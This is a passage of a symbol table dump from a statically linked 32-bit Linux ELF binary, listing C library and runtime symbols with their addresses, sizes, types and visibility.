_L_unlock_2616			.symtab	0x805e601	12	FUNC	<unknown>	DEFAULT	3
_L_unlock_271			.symtab	0x80b296e	13	FUNC	<unknown>	DEFAULT	5
_L_unlock_2768			.symtab	0x805e629	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_2842			.symtab	0x805e639	12	FUNC	<unknown>	DEFAULT	3
_L_unlock_2854			.symtab	0x805c5f3	12	FUNC	<unknown>	DEFAULT	3
_L_unlock_2967			.symtab	0x805c5ff	12	FUNC	<unknown>	DEFAULT	3
_L_unlock_297			.symtab	0x8057ae8	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_30			.symtab	0x805e51d	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_302			.symtab	0x80843fe	9	FUNC	<unknown>	DEFAULT	3
_L_unlock_3032			.symtab	0x80523a3	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_3084			.symtab	0x8065a2d	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_312			.symtab	0x8054269	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_3156			.symtab	0x806da14	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_325			.symtab	0x8052303	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_3273			.symtab	0x806da24	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_3291			.symtab	0x80523c3	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_3293			.symtab	0x806da34	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_33			.symtab	0x805643e	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_3381			.symtab	0x806da44	13	FUNC	<unknown>	DEFAULT	3
_L_unlock_3392			.symtab	0x8065a4d	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_3467			.symtab	0x8065a6d	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_35			.symtab	0x8055e85	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_3539			.symtab	0x8065a8d	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_3596			.symtab	0x80523d3	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_3612			.symtab	0x8065aad	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_366			.symtab	0x8055ec5	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_3689			.symtab	0x80523f3	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_3775			.symtab	0x8065add	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_380			.symtab	0x8056287	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_3814			.symtab	0x8052413	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_392			.symtab	0x8057af8	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_40			.symtab	0x80b1a84	13	FUNC	<unknown>	DEFAULT	4
_L_unlock_401			.symtab	0x8084138	9	FUNC	<unknown>	DEFAULT	3
_L_unlock_4047			.symtab	0x8065b09	12	FUNC	<unknown>	DEFAULT	3
_L_unlock_4277			.symtab	0x8052433	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_4297			.symtab	0x8065b25	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_4342			.symtab	0x8052453	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_4554			.symtab	0x8065b41	12	FUNC	<unknown>	DEFAULT	3
_L_unlock_4640			.symtab	0x8052473	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_4944			.symtab	0x805e661	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_4985			.symtab	0x8065b5d	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_5053			.symtab	0x805e671	12	FUNC	<unknown>	DEFAULT	3
_L_unlock_5083			.symtab	0x8065b7d	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_511			.symtab	0x8055ed5	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_52			.symtab	0x8054249	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_53			.symtab	0x805e52d	12	FUNC	<unknown>	DEFAULT	3
_L_unlock_557			.symtab	0x8055ee5	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_59			.symtab	0x8059773	9	FUNC	<unknown>	DEFAULT	3
_L_unlock_601			.symtab	0x809e505	12	FUNC	<unknown>	DEFAULT	3
_L_unlock_6038			.symtab	0x8065b99	12	FUNC	<unknown>	DEFAULT	3
_L_unlock_612			.symtab	0x8052a70	17	FUNC	<unknown>	DEFAULT	3
_L_unlock_6657			.symtab	0x8065ba5	12	FUNC	<unknown>	DEFAULT	3
_L_unlock_67			.symtab	0x806b6eb	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_672			.symtab	0x8055ef5	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_6754			.symtab	0x8065bbd	12	FUNC	<unknown>	DEFAULT	3
_L_unlock_70			.symtab	0x805995b	9	FUNC	<unknown>	DEFAULT	3
_L_unlock_702			.symtab	0x8069c1c	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_742			.symtab	0x8052f8b	14	FUNC	<unknown>	DEFAULT	3
_L_unlock_785			.symtab	0x807f266	12	FUNC	<unknown>	DEFAULT	3
_L_unlock_788			.symtab	0x80b1985	13	FUNC	<unknown>	DEFAULT	4
_L_unlock_80			.symtab	0x8057aa8	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_82			.symtab	0x805986e	9	FUNC	<unknown>	DEFAULT	3
_L_unlock_832			.symtab	0x8077296	13	FUNC	<unknown>	DEFAULT	3
_L_unlock_86			.symtab	0x805645e	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_867			.symtab	0x8052323	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_892			.symtab	0x8052f99	14	FUNC	<unknown>	DEFAULT	3
_L_unlock_904			.symtab	0x8076c35	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_925			.symtab	0x806e645	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_97			.symtab	0x806bb36	9	FUNC	<unknown>	DEFAULT	3
_L_unlock_978			.symtab	0x805e549	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_98			.symtab	0x8055916	16	FUNC	<unknown>	DEFAULT	3
_L_unlock_98			.symtab	0x808412c	12	FUNC	<unknown>	DEFAULT	3
_Unwind_Backtrace			.symtab	0x80af0d0	213	FUNC	<unknown>	HIDDEN	3
_Unwind_DeleteException			.symtab	0x80ad540	31	FUNC	<unknown>	HIDDEN	3
_Unwind_FindEnclosingFunction			.symtab	0x80ad800	55	FUNC	<unknown>	HIDDEN	3
_Unwind_Find_FDE			.symtab	0x80b0b90	475	FUNC	<unknown>	HIDDEN	3
_Unwind_ForcedUnwind			.symtab	0x80af710	265	FUNC	<unknown>	HIDDEN	3
_Unwind_ForcedUnwind_Phase2			.symtab	0x80af410	257	FUNC	<unknown>	DEFAULT	3
_Unwind_GetCFA			.symtab	0x80ad4d0	11	FUNC	<unknown>	HIDDEN	3
_Unwind_GetDataRelBase			.symtab	0x80ad520	11	FUNC	<unknown>	HIDDEN	3
_Unwind_GetGR			.symtab	0x80ad5d0	101	FUNC	<unknown>	HIDDEN	3
_Unwind_GetIP			.symtab	0x80ad4e0	11	FUNC	<unknown>	HIDDEN	3
_Unwind_GetIPInfo			.symtab	0x80addf0	22	FUNC	<unknown>	HIDDEN	3
_Unwind_GetLanguageSpecificData			.symtab	0x80ad500	11	FUNC	<unknown>	HIDDEN	3
_Unwind_GetRegionStart			.symtab	0x80ad510	11	FUNC	<unknown>	HIDDEN	3
_Unwind_GetTextRelBase			.symtab	0x80ad530	11	FUNC	<unknown>	HIDDEN	3
_Unwind_IteratePhdrCallback			.symtab	0x80b0d70	1309	FUNC	<unknown>	DEFAULT	3
_Unwind_RaiseException			.symtab	0x80af270	407	FUNC	<unknown>	HIDDEN	3
_Unwind_RaiseException_Phase2			.symtab	0x80af1b0	188	FUNC	<unknown>	DEFAULT	3
_Unwind_Resume			.symtab	0x80af620	233	FUNC	<unknown>	HIDDEN	3
_Unwind_Resume_or_Rethrow			.symtab	0x80af520	249	FUNC	<unknown>	HIDDEN	3
_Unwind_SetGR			.symtab	0x80ad560	106	FUNC	<unknown>	HIDDEN	3
_Unwind_SetIP			.symtab	0x80ad4f0	14	FUNC	<unknown>	HIDDEN	3
__CTOR_END__			.symtab	0x80cf124	0	OBJECT	<unknown>	DEFAULT	15
__CTOR_LIST__			.symtab	0x80cf120	0	OBJECT	<unknown>	DEFAULT	15
__DTOR_END__			.symtab	0x80cf130	0	OBJECT	<unknown>	HIDDEN	16
__DTOR_LIST__			.symtab	0x80cf128	0	OBJECT	<unknown>	DEFAULT	16
__EH_FRAME_BEGIN__			.symtab	0x80c7efc	0	OBJECT	<unknown>	DEFAULT	11
__FRAME_END__			.symtab	0x80cdfec	0	OBJECT	<unknown>	DEFAULT	11
__JCR_END__			.symtab	0x80cf134	0	OBJECT	<unknown>	DEFAULT	17
__JCR_LIST__			.symtab	0x80cf134	0	OBJECT	<unknown>	DEFAULT	17
____strtod_l_internal			.symtab	0x80a5fb0	8404	FUNC	<unknown>	DEFAULT	3
____strtof_l_internal			.symtab	0x80a3d70	7471	FUNC	<unknown>	DEFAULT	3
____strtol_l_internal			.symtab	0x8056ab0	1065	FUNC	<unknown>	DEFAULT	3
____strtold_l_internal			.symtab	0x80a8590	8391	FUNC	<unknown>	DEFAULT	3
____strtoll_l_internal			.symtab	0x8056f10	1511	FUNC	<unknown>	DEFAULT	3
____strtoul_l_internal			.symtab	0x8079050	1026	FUNC	<unknown>	DEFAULT	3
____strtoull_l_internal			.symtab	0x80a31f0	1474	FUNC	<unknown>	DEFAULT	3
___asprintf			.symtab	0x80aa850	36	FUNC	<unknown>	DEFAULT	3
___brk_addr			.symtab	0x80d5a80	4	OBJECT	<unknown>	DEFAULT	22
___fxstat64			.symtab	0x8068d20	54	FUNC	<unknown>	DEFAULT	3
___newselect_nocancel			.symtab	0x806917a	45	FUNC	<unknown>	DEFAULT	3
___printf_fp			.symtab	0x807f620	9363	FUNC	<unknown>	DEFAULT	3
___vfprintf_chk			.symtab	0x806ba40	234	FUNC	<unknown>	DEFAULT	3
___vfscanf			.symtab	0x809e4d0	41	FUNC	<unknown>	DEFAULT	3
___xstat64			.symtab	0x8068ce0	54	FUNC	<unknown>	DEFAULT	3
__access			.symtab	0x808b590	31	FUNC	<unknown>	DEFAULT	3
__add_to_environ			.symtab	0x8055aa0	867	FUNC	<unknown>	DEFAULT	3
__after_morecore_hook			.symtab	0x80d4b48	4	OBJECT	<unknown>	DEFAULT	22
__alloc_dir			.symtab	0x80671b0	227	FUNC	<unknown>	DEFAULT	3
__argz_add_sep			.symtab	0x80863f0	150	FUNC	<unknown>	DEFAULT	3
__argz_count			.symtab	0x80862b0	53	FUNC	<unknown>	DEFAULT	3
__argz_create_sep			.symtab	0x80862f0	175	FUNC	<unknown>	DEFAULT	3
__argz_stringify			.symtab	0x80863a0	76	FUNC	<unknown>	DEFAULT	3
__asprintf			.symtab	0x80aa850	36	FUNC	<unknown>	DEFAULT	3
__atomic_writev_replacement			.symtab	0x808b820	345	FUNC	<unknown>	DEFAULT	3
__backtrace			.symtab	0x806b700	211	FUNC	<unknown>	DEFAULT	3
__backtrace_symbols_fd			.symtab	0x806b860	465	FUNC	<unknown>	DEFAULT	3
__brk			.symtab	0x808b7e0	56	FUNC	<unknown>	DEFAULT	3
__bsd_signal			.symtab	0x8055400	201	FUNC	<unknown>	DEFAULT	3
__bss_start			.symtab	0x80cfcc0	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__calloc			.symtab	0x80639e0	842	FUNC	<unknown>	DEFAULT	3
__cfree			.symtab	0x8065320	410	FUNC	<unknown>	DEFAULT	3
__chdir			.symtab	0x808b5d0	27	FUNC	<unknown>	DEFAULT	3
__clearenv			.symtab	0x8055940	112	FUNC	<unknown>	DEFAULT	3
__clone			.symtab	0x806acb0	119	FUNC	<unknown>	DEFAULT	3
__close			.symtab	0x8053ad0	80	FUNC	<unknown>	DEFAULT	3
__close_nocancel			.symtab	0x8053ada	27	FUNC	<unknown>	DEFAULT	3
__closedir			.symtab	0x8067380	67	FUNC	<unknown>	DEFAULT	3
__connect			.symtab	0x8053c30	87	FUNC	<unknown>	DEFAULT	3
__connect_internal			.symtab	0x8053c30	87	FUNC	<unknown>	DEFAULT	3
__correctly_grouped_prefixmb			.symtab	0x8057b20	589	FUNC	<unknown>	DEFAULT	3
__ctype_b_loc			.symtab	0x8055260	50	FUNC	<unknown>	DEFAULT	3
__ctype_tolower_loc			.symtab	0x80551e0	50	FUNC	<unknown>	DEFAULT	3
__ctype_toupper_loc			.symtab	0x8055220	50	FUNC	<unknown>	DEFAULT	3
__curbrk			.symtab	0x80d5a80	4	OBJECT	<unknown>	DEFAULT	22
__current_locale_name			.symtab	0x80a3150	27	FUNC	<unknown>	DEFAULT	3
__cxa_atexit			.symtab	0x8056120	311	FUNC	<unknown>	DEFAULT	3
__data_start			.symtab	0x80cf180	0	NOTYPE	<unknown>	DEFAULT	21
__daylight			.symtab	0x80d59e0	4	OBJECT	<unknown>	DEFAULT	22
__dcgettext			.symtab	0x8095040	57	FUNC	<unknown>	DEFAULT	3
__dcigettext			.symtab	0x8095cc0	1962	FUNC	<unknown>	DEFAULT	3
__deallocate_stack			.symtab	0x8051320	325	FUNC	<unknown>	DEFAULT	3
__default_morecore			.symtab	0x8065ea0	34	FUNC	<unknown>	DEFAULT	3
__default_stacksize			.symtab	0x80cf50c	4	OBJECT	<unknown>	DEFAULT	21
__deregister_frame			.symtab	0x80b0890	49	FUNC	<unknown>	HIDDEN	3
__deregister_frame_info			.symtab	0x80b0870	19	FUNC	<unknown>	HIDDEN	3
__deregister_frame_info_bases			.symtab	0x80b0780	233	FUNC	<unknown>	HIDDEN	3
__dl_iterate_phdr			.symtab	0x80b16e0	239	FUNC	<unknown>	DEFAULT	3
__dladdr			.symtab	0x809eb20	31	FUNC	<unknown>	DEFAULT	3
__dladdr1			.symtab	0x809eb40	86	FUNC	<unknown>	DEFAULT	3
__dlclose			.symtab	0x80aaaf0	25	FUNC	<unknown>	DEFAULT	3
__dlerror			.symtab	0x809e6a0	535	FUNC	<unknown>	DEFAULT	3
__dlinfo			.symtab	0x809eba0	52	FUNC	<unknown>	DEFAULT	3
__dlmopen			.symtab	0x809eca0	78	FUNC	<unknown>	DEFAULT	3
__dlopen			.symtab	0x80aa9f0	72	FUNC	<unknown>	DEFAULT	3
__dlsym			.symtab	0x80aab20	96	FUNC	<unknown>	DEFAULT	3
__dlvsym			.symtab	0x80aaba0	102	FUNC	<unknown>	DEFAULT	3
__do_global_ctors_aux			.symtab	0x80b18c0	0	FUNC	<unknown>	DEFAULT	3
__do_global_dtors_aux			.symtab	0x8048160	0	FUNC	<unknown>	DEFAULT	3
__dprintf			.symtab	0x8083360	36	FUNC	<unknown>	DEFAULT	3
__dso_handle			.symtab	0x80b2b08	0	OBJECT	<unknown>	HIDDEN	7
__dup2			.symtab	0x808b5b0	31	FUNC	<unknown>	DEFAULT	3
__elf_set___libc_atexit_element__IO_cleanup__			.symtab	0x80c7ef0	4	OBJECT	<unknown>	DEFAULT	9
__elf_set___libc_subfreeres_element_buffer_free__			.symtab	0x80c7ec4	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__			.symtab	0x80c7ec0	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__			.symtab	0x80c7ec8	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__			.symtab	0x80c7ecc	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__			.symtab	0x80c7ed0	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__			.symtab	0x80c7ed4	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__			.symtab	0x80c7ed8	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__			.symtab	0x80c7edc	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__			.symtab	0x80c7ee4	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__			.symtab	0x80c7ee8	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__			.symtab	0x80c7eec	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_res_thread_freeres__			.symtab	0x80c7ee0	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_thread_subfreeres_element_arena_thread_freeres__			.symtab	0x80c7ef4	4	OBJECT	<unknown>	DEFAULT	10
__elf_set___libc_thread_subfreeres_element_res_thread_freeres__			.symtab	0x80c7ef8	4	OBJECT	<unknown>	DEFAULT	10
__environ			.symtab	0x80d5034	4	OBJECT	<unknown>	DEFAULT	22
__errno_location			.symtab	0x8054290	17	FUNC	<unknown>	DEFAULT	3
__execve			.symtab	0x8067a40	57	FUNC	<unknown>	DEFAULT	3
__exit_funcs			.symtab	0x80cf514	4	OBJECT	<unknown>	DEFAULT	21
__exit_thread			.symtab	0x8068c00	26	FUNC	<unknown>	DEFAULT	3
__fcloseall			.symtab	0x8059ac0	9	FUNC	<unknown>	DEFAULT	3
__fcntl			.symtab	0x8053b70	177	FUNC	<unknown>	DEFAULT	3
__fcntl_nocancel			.symtab	0x8053b20	69	FUNC	<unknown>	DEFAULT	3
__find_in_stack_list			.symtab	0x80508f0	131	FUNC	<unknown>	DEFAULT	3
__find_specmb			.symtab	0x8083400	117	FUNC	<unknown>	DEFAULT	3
__fini_array_end			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__fini_array_start			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__fopen_internal			.symtab	0x80581c0	218	FUNC	<unknown>	DEFAULT	3
__fopen_maybe_mmap			.symtab	0x8058180	63	FUNC	<unknown>	DEFAULT	3
__fork			.symtab	0x8054280	9	FUNC	<unknown>	DEFAULT	3
__fork_generation			.symtab	0x80d617c	4	OBJECT	<unknown>	DEFAULT	22
__fork_generation_pointer			.symtab	0x80d6248	4	OBJECT	<unknown>	DEFAULT	22
__fork_handlers			.symtab	0x80d624c	4	OBJECT	<unknown>	DEFAULT	22
__fork_lock			.symtab	0x80d50e0	4	OBJECT	<unknown>	DEFAULT	22
__fprintf			.symtab	0x8083330	36	FUNC	<unknown>	DEFAULT	3
__fpu_control			.symtab	0x80cfc58	2	OBJECT	<unknown>	DEFAULT	21
__frame_state_for			.symtab	0x80ae290	298	FUNC	<unknown>	HIDDEN	3
__free			.symtab	0x8065320	410	FUNC	<unknown>	DEFAULT	3
__free_hook			.symtab	0x80d4b44	4	OBJECT	<unknown>	DEFAULT	22
__free_stack_cache			.symtab	0x8050aa0	157	FUNC	<unknown>	DEFAULT	3
__free_tcb			.symtab	0x8051470	70	FUNC	<unknown>	DEFAULT	3
__fsetlocking			.symtab	0x8085ce0	56	FUNC	<unknown>	DEFAULT	3
__funlockfile			.symtab	0x80833c0	47	FUNC	<unknown>	DEFAULT	3
__fxstat64			.symtab	0x8068d20	54	FUNC	<unknown>	DEFAULT	3
__gcc_personality_v0			.symtab	0x80b14b0	538	FUNC	<unknown>	HIDDEN	3
__gconv			.symtab	0x80a2fe0	354	FUNC	<unknown>	DEFAULT	3
__gconv_alias_compare			.symtab	0x806cca0	25	FUNC	<unknown>	DEFAULT	3
__gconv_alias_db			.symtab	0x80d6318	4	OBJECT	<unknown>	DEFAULT	22
__gconv_btwoc_ascii			.symtab	0x806e830	17	FUNC	<unknown>	DEFAULT	3
__gconv_close			.symtab	0x8094890	145	FUNC	<unknown>	DEFAULT	3
__gconv_close_transform			.symtab	0x806ce00	181	FUNC	<unknown>	DEFAULT	3
__gconv_compare_alias			.symtab	0x806cd20	219	FUNC	<unknown>	DEFAULT	3
__gconv_compare_alias_cache			.symtab	0x80731e0	413	FUNC	<unknown>	DEFAULT	3
__gconv_find_shlib			.symtab	0x8073900	397	FUNC	<unknown>	DEFAULT	3
__gconv_find_transform			.symtab	0x806d7b0	564	FUNC	<unknown>	DEFAULT	3
__gconv_get_alias_db			.symtab	0x806cc40	10	FUNC	<unknown>	DEFAULT	3
__gconv_get_builtin_trans			.symtab	0x806e660	450	FUNC	<unknown>	DEFAULT	3
__gconv_get_cache			.symtab	0x8072ee0	10	FUNC	<unknown>	DEFAULT	3
__gconv_get_modules_db			.symtab	0x806cc30	10	FUNC	<unknown>	DEFAULT	3
__gconv_get_path			.symtab	0x806df30	730	FUNC	<unknown>	DEFAULT	3
__gconv_load_cache			.symtab	0x8073000	479	FUNC	<unknown>	DEFAULT	3
__gconv_lock			.symtab	0x80d6314	4	OBJECT	<unknown>	DEFAULT	22
__gconv_lookup_cache			.symtab	0x8073380	1216	FUNC	<unknown>	DEFAULT	3
__gconv_max_path_elem_len			.symtab	0x80d6320	4	OBJECT	<unknown>	DEFAULT	22
__gconv_modules_db			.symtab	0x80d6310	4	OBJECT	<unknown>	DEFAULT	22
__gconv_open			.symtab	0x80a28e0	1786	FUNC	<unknown>	DEFAULT	3
__gconv_path_elem			.symtab	0x80d6324	4	OBJECT	<unknown>	DEFAULT	22
__gconv_path_envvar			.symtab	0x80d631c	4	OBJECT	<unknown>	DEFAULT	22
__gconv_read_conf			.symtab	0x806e210	1061	FUNC	<unknown>	DEFAULT	3
__gconv_release_cache			.symtab	0x8072ef0	26	FUNC	<unknown>	DEFAULT	3
__gconv_release_shlib			.symtab	0x80738b0	34	FUNC	<unknown>	DEFAULT	3
__gconv_release_step			.symtab	0x806ccc0	85	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ascii_internal			.symtab	0x806fa60	891	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ascii			.symtab	0x806f430	1573	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs2			.symtab	0x806e850	1688	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs2reverse			.symtab	0x8070240	1693	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs4			.symtab	0x80712d0	895	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs4le			.symtab	0x8071650	879	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_utf8			.symtab	0x8072680	2138	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs2_internal			.symtab	0x806eef0	1343	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs2reverse_internal			.symtab	0x80708e0	1374	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs4_internal			.symtab	0x8070e40	1164	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs4le_internal			.symtab	0x806fde0	1111	FUNC	<unknown>	DEFAULT	3
__gconv_transform_utf8_internal			.symtab	0x80719c0	3253	FUNC	<unknown>	DEFAULT	3
__gconv_translit_find			.symtab	0x8094a20	610	FUNC	<unknown>	DEFAULT	3
__gconv_transliterate			.symtab	0x8094cb0	873	FUNC	<unknown>	DEFAULT	3
__get_avphys_pages			.symtab	0x806a8a0	14	FUNC	<unknown>	DEFAULT	3
__get_nprocs			.symtab	0x806aaf0	323	FUNC	<unknown>	DEFAULT	3
__get_nprocs_conf			.symtab	0x806aaf0	323	FUNC	<unknown>	DEFAULT	3
__get_phys_pages			.symtab	0x806a8b0	14	FUNC	<unknown>	DEFAULT	3
__getclktck			.symtab	0x806ac40	20	FUNC	<unknown>	DEFAULT	3
__getcwd			.symtab	0x808b5f0	234	FUNC	<unknown>	DEFAULT	3
__getdelim			.symtab	0x8083eb0	624	FUNC	<unknown>	DEFAULT	3
__getdents			.symtab	0x80674a0	159	FUNC	<unknown>	DEFAULT	3
__getdtablesize			.symtab	0x8069140	41	FUNC	<unknown>	DEFAULT	3
__getegid			.symtab	0x808b560	12	FUNC	<unknown>	DEFAULT	3
__geteuid			.symtab	0x808b540	12	FUNC	<unknown>	DEFAULT	3
__getgid			.symtab	0x808b550	12	FUNC	<unknown>	DEFAULT	3
__gethostname			.symtab	0x809fcc0	140	FUNC	<unknown>	DEFAULT	3
__getpagesize			.symtab	0x8069120	23	FUNC	<unknown>	DEFAULT	3
__getpid			.symtab	0x8067ea0	49	FUNC	<unknown>	DEFAULT	3
__getrlimit			.symtab	0x8069030	54	FUNC	<unknown>	DEFAULT	3
__getsockname			.symtab	0x806ae00	30	FUNC	<unknown>	DEFAULT	3
__getsockopt			.symtab	0x806ae20	30	FUNC	<unknown>	DEFAULT	3
__gettext_extract_plural			.symtab	0x8078660	266	FUNC	<unknown>	DEFAULT	3
__gettext_free_exp			.symtab	0x8077ad0	523	FUNC	<unknown>	DEFAULT	3
__gettext_germanic_plural			.symtab	0x80c2248	20	OBJECT	<unknown>	DEFAULT	7
__gettextparse			.symtab	0x8077dd0	2186	FUNC	<unknown>	DEFAULT	3
__gettimeofday			.symtab	0x8067190	31	FUNC	<unknown>	DEFAULT	3
__gettimeofday_internal			.symtab	0x8067190	31	FUNC	<unknown>	DEFAULT	3
__getuid			.symtab	0x808b530	12	FUNC	<unknown>	DEFAULT	3
__gmon_start__			.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__guess_grouping			.symtab	0x807f2a0	76	FUNC	<unknown>	DEFAULT	3
__hash_string			.symtab	0x8078770	59	FUNC	<unknown>	DEFAULT	3
__i686.get_pc_thunk.bx			.symtab	0x80af81d	0	FUNC	<unknown>	HIDDEN	3
__i686.get_pc_thunk.cx			.symtab	0x80af819	0	FUNC	<unknown>	HIDDEN	3
__inet_aton			.symtab	0x806b260	343	FUNC	<unknown>	DEFAULT	3
__init_array_end			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__init_array_start			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__init_misc			.symtab	0x806ac60	78	FUNC	<unknown>	DEFAULT	3
__init_sched_fifo_prio			.symtab	0x8053f80	42	FUNC	<unknown>	DEFAULT	3
__initstate			.symtab	0x8056370	112	FUNC	<unknown>	DEFAULT	3
__initstate_r			.symtab	0x8056780	545	FUNC	<unknown>	DEFAULT	3
__ioctl			.symtab	0x80690f0	33	FUNC	<unknown>	DEFAULT	3
__is_smp			.symtab	0x80d6190	4	OBJECT	<unknown>	DEFAULT	22
__isatty			.symtab	0x808b6e0	34	FUNC	<unknown>	DEFAULT	3
__isinf			.symtab	0x80964d0	64	FUNC	<unknown>	DEFAULT	3
__isinfl			.symtab	0x8096540	85	FUNC	<unknown>	DEFAULT	3
__isnan			.symtab	0x8096510	39	FUNC	<unknown>	DEFAULT	3
__isnanl			.symtab	0x80965a0	69	FUNC	<unknown>	DEFAULT	3
__kill			.symtab	0x8055560	31	FUNC	<unknown>	DEFAULT	3
__lchown			.symtab	0x8068d80	57	FUNC	<unknown>	DEFAULT	3
__libc_alloca_cutoff			.symtab	0x806b010	66	FUNC	<unknown>	DEFAULT	3
__libc_argc			.symtab	0x80d6308	4	OBJECT	<unknown>	DEFAULT	22
__libc_argv			.symtab	0x80d630c	4	OBJECT	<unknown>	DEFAULT	22
__libc_calloc			.symtab	0x80639e0	842	FUNC	<unknown>	DEFAULT	3
__libc_check_standard_fds			.symtab	0x8054cd0	459	FUNC	<unknown>	DEFAULT	3
__libc_cleanup_routine			.symtab	0x806b060	27	FUNC	<unknown>	DEFAULT	3
__libc_close			.symtab	0x8053ad0	80	FUNC	<unknown>	DEFAULT	3
__libc_connect			.symtab	0x8053c30	87	FUNC	<unknown>	DEFAULT	3
__libc_csu_fini			.symtab	0x8055120	57	FUNC	<unknown>	DEFAULT	3
__libc_csu_init			.symtab	0x8055160	127	FUNC	<unknown>	DEFAULT	3
__libc_disable_asynccancel			.symtab	0x806b080	50	FUNC	<unknown>	DEFAULT	3
__libc_dlclose			.symtab	0x80945c0	87	FUNC	<unknown>	DEFAULT	3
__libc_dlopen_mode			.symtab	0x8094700	226	FUNC	<unknown>	DEFAULT	3
__libc_dlsym			.symtab	0x8094620	108	FUNC	<unknown>	DEFAULT	3
__libc_dlsym_private			.symtab	0x8094690	108	FUNC	<unknown>	DEFAULT	3
__libc_enable_asynccancel			.symtab	0x806b0c0	98	FUNC	<unknown>	DEFAULT	3
__libc_enable_secure			.symtab	0x80cf140	4	OBJECT	<unknown>	DEFAULT	18
__libc_enable_secure_decided			.symtab	0x80d6304	4	OBJECT	<unknown>	DEFAULT	22
__libc_errno			.symtab	0x14	4	TLS	<unknown>	DEFAULT	14
__libc_fatal			.symtab	0x8059d90	42	FUNC	<unknown>	DEFAULT	3
__libc_fcntl			.symtab	0x8053b70	177	FUNC	<unknown>	DEFAULT	3
__libc_fork			.symtab	0x8067810	535	FUNC	<unknown>	DEFAULT	3
__libc_free			.symtab	0x8065320	410	FUNC	<unknown>	DEFAULT	3
__libc_init_first			.symtab	0x806cba0	133	FUNC	<unknown>	DEFAULT	3
__libc_init_secure			.symtab	0x806cb40	66	FUNC	<unknown>	DEFAULT	3
__libc_longjmp			.symtab	0x8055350	84	FUNC	<unknown>	DEFAULT	3
__libc_lseek			.symtab	0x8053d50	33	FUNC	<unknown>	DEFAULT	3
__libc_lseek64			.symtab	0x806ad50	117	FUNC	<unknown>	DEFAULT	3
__libc_mallinfo			.symtab	0x8060a60	353	FUNC	<unknown>	DEFAULT	3
__libc_malloc			.symtab	0x8063d30	442	FUNC	<unknown>	DEFAULT	3
__libc_malloc_initialized			.symtab	0x80cf9f8	4	OBJECT	<unknown>	DEFAULT	21
__libc_mallopt			.symtab	0x8061150	356	FUNC	<unknown>	DEFAULT	3
__libc_memalign			.symtab	0x8063ef0	467	FUNC	<unknown>	DEFAULT	3
